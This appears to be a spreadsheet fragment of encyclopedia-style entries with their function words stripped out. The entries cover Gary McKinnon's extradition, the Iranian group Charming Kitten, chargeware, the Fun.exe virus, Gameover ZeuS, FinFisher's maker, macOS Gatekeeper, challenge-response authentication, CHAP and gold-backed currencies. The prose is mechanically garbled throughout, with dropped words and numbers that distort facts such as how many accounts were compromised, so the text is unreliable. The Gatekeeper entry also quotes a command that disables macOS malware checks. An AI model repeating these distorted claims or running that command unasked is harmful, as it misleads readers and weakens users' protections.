ruled upon. mitting ruled answer questions "yes", arguable would unlawful allow extradition. support mckinnon early november 2008, eighty british signed early motion calling custodial sentence imposed american court served prison july 2009, many voted parliament review extradition treaty.in november 2008, rock group marillion announced ready participate benefit concert support mckinnon's struggle avoid extradition united states. organiser planned event ross hemsworth, english radio host. date november 2008. many prominent individuals voiced support, including sting, trudie styler, julie christie, david gilmour, graham nash, peter gabriel, proclaimers, geldof, chrissie hynde, david cameron, boris johnson, stephen fry, terry waite. proposed that, least, tried uk.in august 2009, glasgow newspaper herald reported scots entrepreneur luke heron would £100,000 towards mckinnon's legal costs event extradited us.in article herald, joseph gutheinz, jr., retired nasa office inspector general senior special agent, voiced support mckinnon. gutheinz, also american criminal defence attorney former member texas criminal justice advisory committee offenders medical mental impairments, said feared gary mckinnon would find justice "the american judicial system turns blind towards needs mentally ill".web print media across critical extradition.janis sharp, mckinnon's mother, stood independent candidate 2010 general election blackburn protest sitting labour jack straw, foreign secretary extradition treaty agreed. finished last eight candidates 0.38% vote.on july 2010, bradby, itn's political editor, raised gary mckinnon issue u.s. president barack obama prime minister david cameron joint white house press conference responded discussed working find 'appropriate solution'. song august 2009, pink floyd's david gilmour released online single, "chicago change world", sang played guitar, bass keyboards, promote awareness mckinnon's plight. re-titled cover graham nash song "chicago", featured chrissie hynde geldof, plus mckinnon himself. produced long-time pink floyd collaborator chris thomas made nash's support. statements media mckinnon admitted many public statements obtained unauthorised access computer systems united states including mentioned united states indictment. states motivation, drawn statement made washington press club 2001 disclosure project, find evidence ufos, antigravity technology, suppression "free energy", states proven actions.in interview televised bbc's click programme, stated disclosure project "they credible, relied-upon people, saying yes, technology, there's anti-gravity, there's free energy, extraterrestrial origin [they've] captured spacecraft reverse engineered it." said investigated nasa photographic expert's claim johnson space center's building images regularly cleaned evidence craft, confirmed this, comparing originals "processed" images. stated viewed detailed image "something man-made" "cigar shaped" floating northern hemisphere, assuming viewing would undisrupted owing hour, think capturing image "bedazzled", therefore think securing screen capture function software point connection interrupted. radio play december 2007, radio broadcast john fletcher's 45-minute radio play case, entitled mckinnon extradition. also 1980 rendlesham forest incident adrian lamo babar ahmad david carruthers peter dicks richard o'dwyer christopher tappin syed talha ahsan lauri love julian assange united kingdom–united states relations references further reading mckinnon government united states america another (house lords july 2008).text autistic hacker: gary mckinnon hacked thousands government computers david kushner, july 2011 ieee spectrum external links "gary mckinnon offering search engine optimisation services" support website gary mckinnon's mother hacker voice radio interview mckinnon "the briton facing years prison hacking pentagon" profile: gary mckinnon bull—free gary open letter home secretary) coverage gary mckinnon case since 2006 16min video interview snotr</t>
  </si>
  <si>
    <t>Chattanooga Public Library</t>
  </si>
  <si>
    <t>chattanooga public library (est. 1905) chattanooga, tennessee, municipal public library overseen city government. 1928 hamilton county public library. 2013 opened makerspace.a former building library system listed national register historic places library building. carnegie library built 1904. list databases 2014 library arranges patrons access digital content several providers: references further reading "new york public library looks innovative models renovation", wall street journal, june 2014 "books out, printers reinvented libraries", scientist, july 2014 external links official website flickr. chattanooga public library photos</t>
  </si>
  <si>
    <t>Charming Kitten</t>
  </si>
  <si>
    <t>charming kitten (other aliases include apt35 mandiant), phosphorus microsoft), ajax security fireeye), newsbeef kaspersky,)) iranian government cyberwarfare group, described several companies government officials advanced persistent threat. december 2017, group designated fireeye nation state-based advanced persistent threat, regardless lack sophistication. research conducted fireeye 2018 suggested apt35 expanding malware capabilities intrusion campaigns.the group since known phishing impersonate company websites, well fake accounts fake domains phish users' passwords. history witt defection (early 2013) 2013, former united states force technical sergeant military intelligence defense contractor monica witt defected iran knowing might incur criminal charges united stages giving intelligence government iran later caused operation saffron rose, cyberwarfare operation targeted military contractors. cyberattack (2017) 2017, following cyberattack hbo, large-scale joint investigation launched grounds confidential information leaked. conditional statement hacker going alias sokoote vahshat (persian سکوت وحشت lit. silence fear) said money paid, scripts television episodes, including episodes game thrones, would leaked. hack caused leak terabytes data, shows episodes broadcast time. since stated would take steps make sure would breached again.behzad mesri subsequently indicted hack. since alleged part operation unit leaked confidential information.according certfa, charming kitten targeted officials involved 2015 iran nuclear deal. iranian government denied involvement. second indictment (2019) federal grand jury united states district court district columbia indicted witt espionage charges (speciifcally "conspiracy deliver delivering national defense information representatives iranian government"). indictment unsealed february 2019. indictment, four iranian nationals—mojtaba masoumpour, behzad mesri, hossein parvar mohamad paryar—were charged conspiracy, attempting commit computer intrusion, aggravated identity theft, campaign 2014 2015 sought compromise data witt's former co-workers.in march 2019, microsoft took ownership domains owned iranian government-sponsored hackers, move intended decrease risk spear-phishing cyberattacks. 2020 election interference attempts (2019) according microsoft, 30-day period august september 2019, charming kitten made 2,700 attempts gain information regarding targeted email accounts. this resulted attacks compromised accounts. although initiative deemed aimed united states presidential campaign, none compromised accounts related election. microsoft reveal specifically targeted, subsequent report reuters claimed donald trump's re-election campaign. this assertion corroborated fact trump campaign used microsoft outlook email client. iran denied involvement election meddling, iranian foreign minister mohammad javad zarif stating don’t preference election [the united states] intervene election," don’t interfere internal affairs another country," interview nbc's "meet press".cybersecurity experts microsoft third-party firms clearsky cyber security maintain iran, specifically charming kitten, behind attempted interference, however. october 2019, clearsky released report supporting microsoft's initial conclusion. report, details cyberattack compared previous attacks known originate charming kitten. following similarities found: similar victim profiles. those targeted fell similar categories. they people interest iran fields academia, journalism, human rights activism, political opposition. time overlap. verified charming kitten activity ramping within timeframe election interference attempts made. consistent attack vectors. methods attack similar, malicious agents relying spear-phishing texts. also sony pictures hack monica witt references</t>
  </si>
  <si>
    <t>Chargeware</t>
  </si>
  <si>
    <t>chargeware seemingly valid looking mobile applications used charge user services without proper notification knowledge. often focused internet pornography, third-party porn apps downloaded onto user's mobile device, turn infecting phone malware known chargeware.the purpose chargeware manipulate user agreeing unclear terms fees charges applied without user's full understanding consent.chargeware deliberately difficult renege from, charges continue long possible without carrier interference.in 2013, hundreds thousands users, primarily france experienced applications nature ultimately forms malware mobile device(s). various countries, spain, encountered chargeware infections almost matched number adware infections; japan lowest number chargeware infections country.hackers reportedly learning market changing tactics (i.e., mobile malware) operations harder trace harder shut down. said markets also include specific countries, since charging practices vary either country carrier basis. references</t>
  </si>
  <si>
    <t>Fruux</t>
  </si>
  <si>
    <t>fruux cross-platform synchronization service operated fruux, company behind popular open source project sabredav. service enables users synchronize address book contacts, calendar events, tasks, bookmarks notes apple computers devices. also allows manage contacts, calendars tasks browser.fruux synchronization uses encrypted transfers. fruux supports conflict resolution helps users data changed computer choose correct dataset. fruux runs entirely amazon services infrastructure. company uses amazon elastic load balancing, amazon elastic compute cloud (amazon ec2) amazon elastic block store (amazon ebs) nginx servers. amazon simple storage service (amazon fruux’s choice versioned application code backup storage. addition, fruux uses amazon relational database service (amazon rds) manage central databases amazon simple email service (ses) highly scalable bulk transactional email-sending service. service similar services icloud plaxo. fruux supports synchronization mainly contacts, calendar events items wide array devices services. 2011 company announced launch calendar syncing caldav capable devices also offering contact synchronization carddav capable devices.the company released device management layer 2012 working special offering teams another distinguishing feature. calendar sharing feature allows users invite people calendars possibility individual permissions gives first glimpse future team offering.fruux secured six-figure seed round march 2012, high-tech gründerfonds. references external links official website official blog</t>
  </si>
  <si>
    <t>Chameleon botnet</t>
  </si>
  <si>
    <t>chameleon botnet botnet discovered february 2013 security research firm, spider.io. involved infection 120,000 computers generated, average, million dollars month advertising traffic. this traffic generated infected systems looked advertising parties regular users browsed web, seen legitimate traffic. affected computers windows majority private (residential systems).to make actions software look like legitimate human behavior, made mouse infected systems move around pages browsers rebooted system sessions crashed.also, sophisticated adobe flash javascript scripts executed infected systems. there least websites targeted botnet billion advertisements served it.as side effect traffic generated botnet, infected systems likely suffered general operating slow network connectivity well. these symptoms indicators possibly infected. with malware removal software like clamwin exterminate it!, infection could removed infected system. also possible deactivate malware changing registry infected windows manually. references external links site spider.io chameleon botnet</t>
  </si>
  <si>
    <t>Fun.exe virus</t>
  </si>
  <si>
    <t>fun.exe virus w32.assarm family computer viruses. according symantec registers windows system process periodically sends mail spreading attachments response unopened emails outlook express. this virus first appeared early 2008 recognized anti virus programs. infection virus install multiple copies throughout system. makes hard remove installing many different copies different names different locations. running copy system process restart closed manually. adds auto information executes multiple copies startup. copies monitor restore deleted. this makes deleting windows nearly impossible. known file names used virus fun.exe, dc.exe, other.exe, sviq.exe, win.exe, winsit.exe, windev.exe known thisisnotmalwarelol.exe usually imbedded powerpoints bypassing antivirus's including sophos, kaspersky totalav. file icon made look like icon folder, inviting user open folder actually running program thus starting initial infection. however graphic icon folder poorly ripped windows service icons distinguished subtle visual differences, predominantly white black outline folder real folder icon dithered transparent space. this visual difference especially noticeable safe mode graphic operating capacity color mode instead color mode. files show creation date 6-23-2008 show original name olalatheworld.exe internal name olalatheworld. files 124,928 bytes size. these characteristics help distinguish infected files, important names used file names legitimate windows files therefore care must taken accidentally remove vital windows file. references</t>
  </si>
  <si>
    <t>Fureai kippu</t>
  </si>
  <si>
    <t>fureai kippu japanese ふれあい切符: caring relationship tickets) japanese sectoral currency created 1995 sawayaka welfare foundation people could earn credits helping seniors community.the basic unit account hour service elderly person. sometimes seniors help earn credits, times family members communities earn credits transfer parents live elsewhere. example, elderly woman longer driver’s license; shop her, credit that, based kind service number hours. these credits accumulate- users keep become sick elderly themselves, credits exchange services. alternatively, users transfer credits someone else. surprising part project elderly tend prefer services provided people paid fureai kippu paid yen. this personal connection. when surveyed elderly, clear preferred people worked fureai kippu people worked nature relationship. convert community service would seem dilute community ethic. there clearinghouses send credits side japan other.china, too, starting implement fureai kippu concept. 2005, largest complementary currency system world china.these early examples ‘marketplace revolution’ fiat currency broadened community capital; economic, social, human, physical cultural values. tokenization enables asset valuation, case unit account seniors credits services provided. (marketplace revolution concentrated wealth community capital david lepage, social canada 2020) also demurrage (currency) fureai local exchange trading system references</t>
  </si>
  <si>
    <t>Furius ISO Mount</t>
  </si>
  <si>
    <t>furius mount free open-source virtual drive software linux, based gtk2 python2, mount disc image files including iso, img, bin, nrg. also acetoneiso cdemu list image software file mounter references external links furius mount launchpad</t>
  </si>
  <si>
    <t>Futmalls</t>
  </si>
  <si>
    <t>futmalls (chinese name: 預支未來) also known futmalls.com 2020 taiwanese science fiction series director chun-yu. filming completed august 2019, premiered youku december 2020. show co-produced entertainment. synopsis "futmalls.com" (original title: "future malls", advance future chinese name) 2020 science fiction drama series. directed chun-yu.the series three different stories connected website futmalls.com. investigation series strange cases leads police officer zhao zhen mysterious website called "futmalls.com," claims future. there, customers anything future site, including future love, fame beauty. futmalls mysterious shopping site, unlinkable users presumably randomly selected. cast main bryan shu-hao chang zhao xu-zhen eugenie yang nian-jun bruce hung zhong-wei shao yu-wei yong-xin recurring allison yong-li river huang xiang-da chien-ho zhan guo-xiang chen-guang phoebe huang jiang mei-zhen chung-heng chen guan-ting wei-jie you-yi tzu-xi zheng-mei tieh-hsiang uncle ting chun-cheng zhuang wang ko-yuan chen kai-xiang special guest heaven chief editor deng an-ning commander shi-min yang, nian-jun's father pei-hsia mrs. yang, nian-jun's mother yang da-jing ceremony host episodes season (2020) references external links futmalls netflix futmalls imdb futmalls douban chinese) futmalls myvideo chinese) futmalls youku chinese)</t>
  </si>
  <si>
    <t>Chamber of Digital Commerce</t>
  </si>
  <si>
    <t>chamber digital commerce american advocacy group promotes emerging industry behind blockchain technology, bitcoin, digital currency digital assets. history headquartered washington, d.c., organization founded july 2014 perianne boring. october 2014, chamber received 501(c)(6) non-profit status internal revenue service. 2015, economist former jpmorgan chase executive blythe masters appointed advisory board.in december 2019, former chairman commodity futures trading commission christopher giancarlo appointed advisory board chamber. (political action committee) august 2014, political news site hill reported chamber registered political action committee united states federal election commission. hill piece noted, “formation sign increasing maturity bitcoin signal politicians could face political pressure support virtual currencies.” date, however, raised $10,000 $2,700 contributed candidate. references external links official website</t>
  </si>
  <si>
    <t>GPG Mail</t>
  </si>
  <si>
    <t>mail commercial extension apple mail comes part suite, software collection provides easy access collection tools designed secure communications encrypt files. mail provides public email encryption signing. integrates default email client apple mail macos actual cryptographic functionality handled privacy guard.gpg mail first released february 2001, stéphane corthésy. since 2010 mail maintained gpgtools. while privacy guard free open-source software, mail requires purchase support plan.on september 2018, developer introduced mail part suite 2018.4, software release included support macos mojave. release, developer removed free license option mail. users relied automated upgrades caught surprise, prompted significant backlash community. while licensing change identified release notes suite 2018.4, many believed change required prominent notifications avoid perception "bait switch".in august 2019 default server switched hagrid, verifying server located keys.openpgp.org. this improved quality search results public keys increased control users public keys stored server. november 2020, mail introduced, supporting macos mojave, macos catalina macos sur. also email encryption openpgp end-to-end encryption cryptography references external links gpgtools website</t>
  </si>
  <si>
    <t>Challenge–response authentication</t>
  </si>
  <si>
    <t>computer security, challenge–response authentication family protocols party presents question ("challenge") another party must provide valid answer ("response") authenticated.the simplest example challenge–response protocol password authentication, challenge asking password valid response correct password. adversary eavesdrop password authentication authenticate reusing intercepted password. solution issue multiple passwords, marked identifier. verifier passwords, prover must correct password identifier. assuming passwords chosen independently, adversary intercepts challenge–response message pair clues help different challenge different time. example, communications security methods unavailable, u.s. military uses akac-1553 triad numeral cipher authenticate encrypt communications. triad includes list three-letter challenge codes, verifier supposed choose randomly from, random three-letter responses them. added security, codes valid particular time period ordinarily hours. interesting challenge–response technique works follows. controlling access resource. alice comes along seeking entry. issues challenge, perhaps "52w72y". alice must respond string characters "fits" challenge issued. "fit" determined algorithm agreed upon alice. (the correct response might simple "63x83z", algorithm changing character challenge using caesar cipher). real world, algorithm would much complex.) issues different challenge time, thus knowing previous correct response (even "hidden" means communication used alice bob) use. other non-cryptographic protocols challenge–response protocols also used assert things knowledge secret value. captchas, example, variant turing test, meant determine whether viewer mobile application real person. early captchas, challenge sent viewer distorted image text, viewer responded typing text. distortion designed make automated optical character recognition (ocr) difficult prevent computer program passing human. however, advances ocr, captchas commonly based object detection challenges. cryptographic techniques non-cryptographic authentication generally adequate days internet, user could sure system asking password really system trying access, nobody likely eavesdropping communication channel observe password entered. address insecure channel problem, sophisticated approach necessary. many cryptographic solutions involve two-way authentication, user system must convince know shared secret (the password), without secret ever transmitted clear communication channel, eavesdroppers might lurking. done involves using password encryption transmit randomly generated information challenge, whereupon must return response similarly encrypted value predetermined function originally offered information, thus proving able decrypt challenge. instance, kerberos, challenge encrypted integer response encrypted integer proving able decrypt integer hash function also applied password random challenge value create response value. another variation uses probabilistic model provide randomized challenges conditioned model input.such encrypted hashed exchanges directly reveal password eavesdropper. however, supply enough information allow eavesdropper deduce password using dictionary attack brute-force attack. information randomly generated exchange (and response different challenge) guards possibility replay attack, malicious intermediary simply records exchanged data retransmits later time fool thinking authenticated connection attempt other. authentication protocols usually employ cryptographic nonce challenge ensure every challenge–response sequence unique. this protects eavesdropping subsequent replay attack. impractical implement true nonce, strong cryptographically secure pseudorandom number generator cryptographic hash function generate challenges highly unlikely occur once. sometimes important time-based nonces, weaken servers different time zones servers inaccurate clocks. also important time-based nonces synchronized clocks application vulnerable delayed message attack. this attack occurs attacker copies transmission whilst blocking reaching destination, allowing replay captured transmission delay choosing. this easily accomplished wireless channels. time-based nonce used limit attacker resending message restricted expiry time perhaps less second, likely effect upon application mitigating attack. mutual authentication performed using challenge–response handshake directions; server ensures client knows secret, client also ensures server knows secret, protects rogue server impersonating real server. challenge–response authentication help solve problem exchanging session keys encryption. using derivation function, challenge value secret combined generate unpredictable encryption session. this particularly effective man-in-the-middle attack, attacker able derive session challenge without knowing secret, therefore able decrypt data stream. simple example mutual authentication sequence server sends unique challenge value client client sends unique challenge value server server computes hash(cc secret) sends client client computes hash(sc secret) sends server server calculates expected value ensures client responded correctly client calculates expected value ensures server responded correctlywhere server-generated challenge client-generated challenge client response server response password storage avoid storage passwords, operating systems (e.g. unix-type) store hash password rather storing password itself. during authentication, system need verify hash password entered matches hash stored password database. this makes difficult intruder passwords, since password stored, difficult determine password matches given hash. however, presents problem many (but all) challenge–response algorithms, require client server shared secret. since password stored, challenge–response algorithm usually hash password secret instead password itself. case, intruder actual hash, rather password, makes stored hashes sensitive actual passwords. scram challenge–response algorithm avoids problem. examples examples sophisticated challenge-response algorithms are: zero-knowledge password proof agreement systems (such secure remote password (srp)) challenge-handshake authentication protocol (chap) (rfc 1994) cram-md5, ocra: oath challenge-response algorithm (rfc 6287) salted challenge response authentication mechanism (scram) (rfc 5802) ssh's challenge-response system based [1].some people consider captcha kind challenge-response authentication blocks spambots. also challenge-handshake authentication protocol challenge–response spam filtering cram-md5 cryptographic hash function cryptographic nonce kerberos otway–rees protocol needham–schroeder protocol wide mouth frog protocol password-authenticated agreement salted challenge response authentication mechanism sqrl distance-bounding protocol reflection attack replay attack man-in-the-middle attack webauthn references</t>
  </si>
  <si>
    <t>GadgetTrak</t>
  </si>
  <si>
    <t>gadgettrak company based portland, oregon develops theft recovery data protection software name. company founded february 2007 westin launch first theft recovery product mass storage devices, tracked stolen devices including ipods, flash drives, digital cameras devices connected computer. company issued patent technology february 2009. gadgettrak's technology featured special segment dateline ipod theft tracked stolen ipods confronted thieves. customized version technology embedded flir thermal imaging cameras part exclusive licensing agreement name thermatrak utilized theft recovery well export controls. patents company issued patents groundbreaking technologies: patent 9,083,624 applies process tracking lost stolen computing devices wi-fi and/or and/or cellular triangulation. patent 7,496,201 applies process tracking recovering devices ipods, flash drives, digital cameras. mobile software windows blackberry october 2008, company launched gadgettrak mobile security blackberry windows mobile devices. apple iphones november 2008, company launched first mobile security software apple iphone year half apple launched find iphone.android devices 2012, company launched version gadgettrak mobile security android devices. along android release, upgrades added, including web-based control panel activate tracking, remotely wipe data device, encrypt backup data well enterprise group management console. just launch, application test chain sprint stores installed software demo units. store tigard, oregon several devices stolen. with help gadgettrak mobile security app, able recover devices apprehend thieves. laptop software laptops november 2008, company launched laptop version software utilizes camera capture photo thief, well utilization wi-fi positioning provide location within 10–20 meters. shortly product launch, number stolen laptop recoveries using software, first brooklyn, york stolen imac tracked tattoo parlour police recovered stolen computer along stolen property.windows laptops april 2009, company launched windows version laptop software expanding product offering. highlighted recoveries gadgettrak claims many "firsts" regards devices recovered methods used. june 2007 (newmarket, first known recovery stolen ipod ever using tracking technology followed others february 2008 (dallas, first known recovery stolen flash drive using tracking technology november 2008 (anchorage, first known recovery stolen cell phone using tracking technology june 2009 (edmund, first recovery stolen phone recovered even card removed august 2009 (brooklyn, )first recovery stolen computer utilizing wi-fi positioning camera hardware september 2009 (oakland, business broken multiple laptops stolen, gadgettrak installed police house multiple stolen laptops discovered well methamphetamine november 2009 (portland, missouri) gadgettrak tracked stolen laptop portland, missouri unveiling organized theft ring fencing stolen property states avoid detection january 2010 (springfield, gadgettrak software leads police burglary suspect recovering stolen laptop family jewelry february 2010 (portland, after series repeated break-ins computer thefts portland area schools, school district install gadgettrak several "bait" devices, within week school robbed luckily including laptops software them. gadgettrak police tracked stolen laptop vancouver, ended arresting people involved theft ring. january 2011 (moraga, laptop stolen mary's college student recovered police several weeks tracking reports gadgettrak february 2011 portland, laptop stolen home year's recovered photos, location data provided police general area address confirmed exact address identity person possession stolen laptop references</t>
  </si>
  <si>
    <t>Gameover ZeuS</t>
  </si>
  <si>
    <t>gameoverzeus peer-to-peer botnet based components earlier zeus trojan. malware created russian hacker evgeniy mikhailovich bogachev. believed spread cutwail botnet.unlike predecessor zeus trojan, gameover zeus uses encrypted peer-to-peer communication system communicate nodes command control servers, greatly reducing vulnerability enforcement operations. algorithm used appears modeled kademlia protocol.scammers control monitor gameover zeus command control (c&amp;c) servers. virus establishes connection server soon malicious executable installs computer, point disable certain system processes, download launch executables, delete essential system files, making system unusable.according report symantec, gameover zeus largely used banking fraud distribution cryptolocker ransomware. evgeniy mikhailovich bogachev early june 2014, u.s. department justice announced international inter-agency collaboration named operation tovar succeeded temporarily cutting communication gameover zeus command control servers. this effort shut evgeniy mikhailovich bogachev criminal infrastructure liberate computers infected gameover zeus."he indicted united states, accused creating sprawling network virus-infected computers siphon hundreds millions dollars bank accounts around world, targeting anyone enough money worth stealing." widely circulated photo, pictured holding domestic bengal cat. bitdefender identified gameover zeus variants wild: generates 1,000 domains generates 10,000 day. reward february 2015, announced reward million exchange information regarding alleged russian cybercriminal evgeniy mikhailovich bogachev (also known online "slavik", "lucky12345", "pollingsoon", "monstr", "ioo" "nu11") suspected association gameover zeus.the reward million highest ever cybercriminal. thursday, december 2019, f.b.i. issued million reward leader 'evil corp' hacker group, maksim viktorovich yakubets development deployment dridex banking trojan virus. also conficker command control (malware) operation tovar russian interference 2016 united states elections timeline computer viruses worms tiny banker trojan torpig zeus (malware) zombie (computer science) references</t>
  </si>
  <si>
    <t>Gamma Group</t>
  </si>
  <si>
    <t>gamma group anglo-german technology company sells surveillance software governments police forces around world. company strongly criticised human rights organisations selling finfisher software undemocratic regimes egypt bahrain. following arab spring protests 2011, activists bahrain identified suspicious emails identified social engineering attempts persuade launch applications containing malicious software. emails passed analysts identified malware would give finfisher access infected computers.the university toronto's citizenlab conducted investigation gamma identified likely government users finfisher countries, based presence finfisher master address country belonging specific government department."in 2014, gamma group hacked hacker calling phineas fisher gigabyte dump information released detailing gamma's 'client lists, price lists, source code, details effectiveness finfisher malware, user support documentation, list classes/tutorials, much more.' further details gamma's capabilities found surveillance industry index.despite hack extent negative publicity gamma's activities, finfisher reported gaining popularity around world numerous governments. references external links official website</t>
  </si>
  <si>
    <t>Challenge-Handshake Authentication Protocol</t>
  </si>
  <si>
    <t>computing, challenge-handshake authentication protocol (chap) authentication protocol originally used point-to-point protocol (ppp) validate users. chap also carried authentication protocols radius diameter. almost network operating systems support chap, network access servers. chap also used pppoe, authenticating users. sends data unencrypted clear", chap vulnerable attacker observe session. attacker user's name, chap challenge, chap response, information associated session. attacker mount offline dictionary attack order obtain original password. when used ppp, chap also provides protection replay attacks peer challenge generated authenticator, typically network access server. where chap used protocols, sent clear, protected security layer transport layer security (tls). example, chap sent radius using user datagram protocol (udp), attacker radius packets mount offline dictionary attack, ppp. chap requires client server know clear-text version password, although password never sent network. thus used ppp, chap provides better security compared password authentication protocol (pap) vulnerable reasons. benefits chap when peer sends chap, authentication server receive obtain "known good" password database, perform chap calculations. resulting hashes match, user deemed authenticated. hashes match, users authentication attempt rejected. since authentication server store password clear-text, impossible different formats stored password. attacker steal entire database passwords, passwords would visible clear" database. result, chap secure used link, prevents secure storage rest" methods pap. variants ms-chap similar chap uses different hash algorithm, allows party authenticate other. working cycle chap authentication scheme originally used point-to-point protocol (ppp) servers validate identity remote clients. chap periodically verifies identity client using three-way handshake. this happens time establishing initial link (lcp), happen time afterwards. verification based shared secret (such client's password). after completion link establishment phase, authenticator sends "challenge" message peer. peer responds value calculated using one-way hash function challenge secret combined. authenticator checks response calculation expected hash value. values match, authenticator acknowledges authentication; otherwise terminate connection. ppp, authenticator send challenge random intervals peer repeats steps however, chap used situations (e.g. radius), step performed. chap packets chosen random challenge also used corresponding response, success, failure packets. challenge must different last challenge another success failure lost, response sent again, triggers success failure indication. hash response value md5(id||secret||challenge), concatenation secret, challenge. also list authentication protocols password authentication protocol challenge–response authentication cryptographic hash function references external links 1994 challenge handshake authentication protocol (chap) 2865 remote authentication dial user service (radius): uses chap 3748 extensible authentication protocol (eap): discusses chap</t>
  </si>
  <si>
    <t>Chainalysis</t>
  </si>
  <si>
    <t>chainalysis american blockchain analysis firm headquartered york city. company cofounded michael gronager jonathan levin 2014. sells software aids customers blockchain analysis. customers included united states's federal bureau investigation, drug enforcement agency, internal revenue service criminal investigation, well united kingdom's national crime agency. history chainalysis founded official investigators hack cryptocurrency exchange gox.in march 2021, partnered crypto compliance company notabene comply fatf's travel rule across jurisdictions. noted investigations chainalysis helped enforcement recover cryptocurrencies illegal enterprises. example, company helped enforcement recover billion take dark marketplace silk road. further, company also helped attribute seven 2021 cryptocurrency thefts north korean lazarus group. references external links official website</t>
  </si>
  <si>
    <t>Gatekeeper (macOS)</t>
  </si>
  <si>
    <t>gatekeeper security feature macos operating system apple. enforces code signing verifies downloaded applications allowing run, thereby reducing likelihood inadvertently executing malware. gatekeeper builds upon file quarantine, introduced leopard expanded snow leopard. feature originated version 10.7.3 lion command-line utility spctl. graphical user interface originally added mountain lion (10.8) backported lion 10.7.5 update. functions configuration security privacy panel system preferences, user three options, allowing apps downloaded from: store allows applications downloaded store launched. store identified developers allows applications downloaded store applications signed certified apple developers launched. this default setting since mountain lion. anywhere allows applications launched. this effectively turns gatekeeper off. this default setting lion. since macos sierra, option hidden default. however, option re-enabled using 'sudo spctl --master-disable' command terminal authenticating admin password. command-line utility spctl provides granular controls, custom rules individual blanket permissions, well option turn gatekeeper off. quarantine upon download application, particular extended file attribute ("quarantine flag") added downloaded file. this attribute added application downloads file, browser email client, usually added common bittorrent client software, transmission, application developers need implement feature applications implemented system. system also force behavior upon individual applications using signature-based system named xprotect. execution when user attempts open application attribute, system postpone execution verify whether blacklisted, code-signed apple certified developer, code-signed contents still match signature.since snow leopard, system keeps blacklists identify known malware insecure software. blacklists updated periodically. application blacklisted, file quarantine refuse open recommend user move trash.gatekeeper refuse open application code-signing requirements met. apple revoke developer's certificate application signed prevent distribution.once application passed file quarantine gatekeeper, allowed normally verified again. override override gatekeeper, user (acting administrator) either switch lenient policy security privacy panel system preferences authorize manual override particular application, either opening application context menu adding spctl. path randomization developers sign disk images verified unit system. macos sierra, allows developers guarantee integrity bundled files prevent attackers infecting subsequently redistributing them. addition, "path randomization" executes application bundles random, hidden path prevents accessing external files relative location. this feature turned application bundle originated signed installer package disk image user manually moved application without files another directory. implications effectiveness rationale gatekeeper combating malware acknowledged, reservations. security researcher chris miller noted gatekeeper verify developer certificate consult known-malware list application first opened. malware already passed gatekeeper stopped. addition, gatekeeper verify applications quarantine flag. flag added applications system, neglect failure trigger gatekeeper. according security blogger thomas reed, bittorrent clients frequent offenders this. flag also added application came different source, like network shares flash drives. questions also raised registration process acquire developer certificate prospect certificate theft.in september 2015, security researcher patrick wardle wrote another shortcoming concerns applications distributed external files, libraries even html files contain javascript. attacker manipulate files exploit vulnerability signed application. application external files redistributed, leaving original signature application bundle intact. gatekeeper verify individual files, security compromised. with path randomization signed disk images, apple provided mechanisms mitigate issue macos sierra.in 2021, vulnerability discovered putting first line (without path interpreter) file bypassed gatekeeper. also microsoft smartscreen system integrity protection sandbox (computer security) references</t>
  </si>
  <si>
    <t>Gold gram</t>
  </si>
  <si>
    <t>gold gram amount value represented exactly gram gold. unit account frequently used digital gold currencies. sometimes denoted symbol "gg", "aug", "gau". milligram gold sometimes referred mgg. therefore, 1000 1000 mil, 0.001 0.001 aug. this allows gold holdings transfers take place tiny fractions gram (equivalent cents) possible source confusion gold often priced open market traditional troy ounce (one troy ounce exactly 31.1034768 grams, larger avoirdupois ounce generally united states mass 28.35 grams). kilogram gold prices commonly used zurich gold pool 1,000 kilograms tonne. references</t>
  </si>
  <si>
    <t>Goldback</t>
  </si>
  <si>
    <t>goldback family local currencies operating four u.s. states launched goldback, inc. utah 2019. goldbacks contain thin layer gold within polymer coating. overview goldbacks shaped like regular currency notes contain pure gold. gold safely contained layers clear polyester, artistic elements fractional gold bullion contain. term goldback refers unit currency 1/1000 ounce pure gold. goldbacks issued denominations containing proportionally larger amounts gold. notes minted valaurum, regulated certified private mint mints gold products various governments across world. valaurum uses proprietary patented vacuum deposition process fuse gold atomically together thin sheets encased plastic film designed hold gold. since launch goldback, company also sells leather wallet designed goldbacks. initially funded lease gold united precious metals association, approximately $1,000,000 gold, demand grown $100k month, million month sales. more million worth goldbacks manufactured circulated, although up-to-date market published. while sold local currency four regions, purchased gold product, collector’s value, worldwide. utah goldback launched 2019, series nevada, hampshire, wyoming launching 2020, 2021, 2022, respectively. reported affiliate salt lake city, reported local businesses seeing surge people using goldbacks everyday transactions. reuters reported 2022 many quarter half small businesses utah accept [goldback] notes". meanwhile, nevada seen buyers purchasing goldbacks part inflation hedge investment vehicle. design each goldback features feminine figure, symbolically representing cardinal virtue. which virtues represented represented varies according state series region serves. while series different design, interchangeable contain amount gold. size shape bill also tell part story money. size shape early american currency, 25gb note identical size federal reserve note, 50gb note size gold certificate. 10gb notes proportionally larger smaller this enables wallets comfortably hold goldbacks. utah series depicts virtues liberty, victory, justice, truth, prudence. nevada series depicts virtues liberty, fortitude, justice, wisdom, charity, hampshire series depicts virtues liberty, fortitude, foresight, truth, grace gratitude). three series also feature animals plants native states. legal status legal status goldback varies state state, local currencies addressed federal law. creation utah goldback inspired passage utah legal tender provides adoption gold silver legal tender state. utah goldback formally adopted state government privately issued, proponents currency claim form gold bullion produced recognized regulated private mint falls legal tender provisions act. this seems affirmed utah legislature march 2022. utah state legislature expanded definition legalized gold legal tender—explicitly making gold "polymer holder" "coating" subject state sales tax—specifically metal that, "...has gold, silver, platinum metallic content more, exclusive transparent polymer holder, coating, encasement..." future legislation litigation necessary establish legal limits goldback state legal tender. goldback also serves note bill redemption u.s. minted legal tender gold coins vaults united precious metals association, therefore backed legal tender money state federal law, regardless independent status gold money. first goldbacks made utah, partly result legalization gold silver legal tender utah 2011 part utah legal tender act, partly founder first employees based utah, strong culture precious metals collecting appreciation. contrast prior concepts attempts achieving gold silver common medium exchange, liberty dollar, goldback considered possibility legal issues inception. with mind, company behind goldback built-in features ensure goldbacks cannot confused government issued legal tender, united states dollar. effort company also took order avoid issues federal counterfeit laws perceived threat dollar hegemony print terms goldback "voluntary negotiable instrument" "for circulation utah", "for circulation hampshire", "for circulation" specific whichever state particular goldback question 'printed' for. also, text "privately issued, u.s. dollar legal tender. international patents pending" appears goldback denominations states issue).the makers goldback contract another firm actually manufacture goldback, company called valaurum (based oregon). valaurum says concern: over years, many entrepreneurs afoul u.s. treasury department trying create money. [adam] trexler [founder owner valaurum] adamant that’s they’re goldbacks simply small amounts gold that, hopes, might wallet right next paper bills whatever else future holds. criticism some commentators 